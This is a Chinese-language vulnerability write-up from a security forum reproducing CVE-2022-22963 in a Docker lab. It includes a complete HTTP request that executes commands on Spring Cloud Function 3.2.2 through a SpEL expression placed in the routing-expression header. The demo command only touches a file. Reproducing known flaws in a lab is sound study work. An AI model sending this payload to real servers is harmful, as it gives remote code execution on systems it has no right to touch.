奇安信攻防社区-Spring Cloud Function SpEL表达式命令注入（CVE-2022-22963）

Spring Cloud Function SpEL表达式命令注入（CVE-2022-22963）

# Spring Cloud Function SpEL表达式命令注入（CVE-2022-22963） Spring Cloud Function 提供了一个通用的模型，用于在各种平台上部署基于函数的软件，包括像 Amazon AWS Lambda 这样的 FaaS...

Spring Cloud Function SpEL表达式命令注入（CVE-2022-22963）
=================================================

Spring Cloud Function 提供了一个通用的模型，用于在各种平台上部署基于函数的软件，包括像 Amazon AWS Lambda 这样的 FaaS（函数即服务，function as a service）平台。

参考链接：

- <https://tanzu.vmware.com/security/cve-2022-22963>
- <https://mp.weixin.qq.com/s/onYJWIESgLaWS64lCgsKdw>
- <https://github.com/spring-cloud/spring-cloud-function/commit/0e89ee27b2e76138c16bcba6f4bca906c4f3744f>

漏洞环境
----

执行如下命令启动一个使用Spring Cloud Function 3.2.2编写的服务器：

```php
docker compose up -d
```

服务启动后，执行`curl http://your-ip:8080/uppercase -H "Content-Type: text/plain" --data-binary test`即可执行`uppercase`函数，将输入字符串转换成大写。

漏洞复现
----

发送如下数据包，`spring.cloud.function.routing-expression`头中包含的SpEL表达式将会被执行：

```php
POST /functionRouter HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("touch /tmp/success")
Content-Type: text/plain
Content-Length: 4

test
```

![](https://shs3.b.qianxin.com/butian_public/f495773c8c2002a49e95dc52927d14c0d2bfa289ed7fb.jpg)

可见，`touch /tmp/success`已经成功被执行：

![](https://shs3.b.qianxin.com/butian_public/f2980355e24554e62790044a75c6c24892e943d907030.jpg)

发表于 2024-07-12 18:48:59
阅读 ( 1046 )
分类：开发框架

Spring Cloud Function SpEL表达式命令注入（CVE-2022-22963）

0 条评论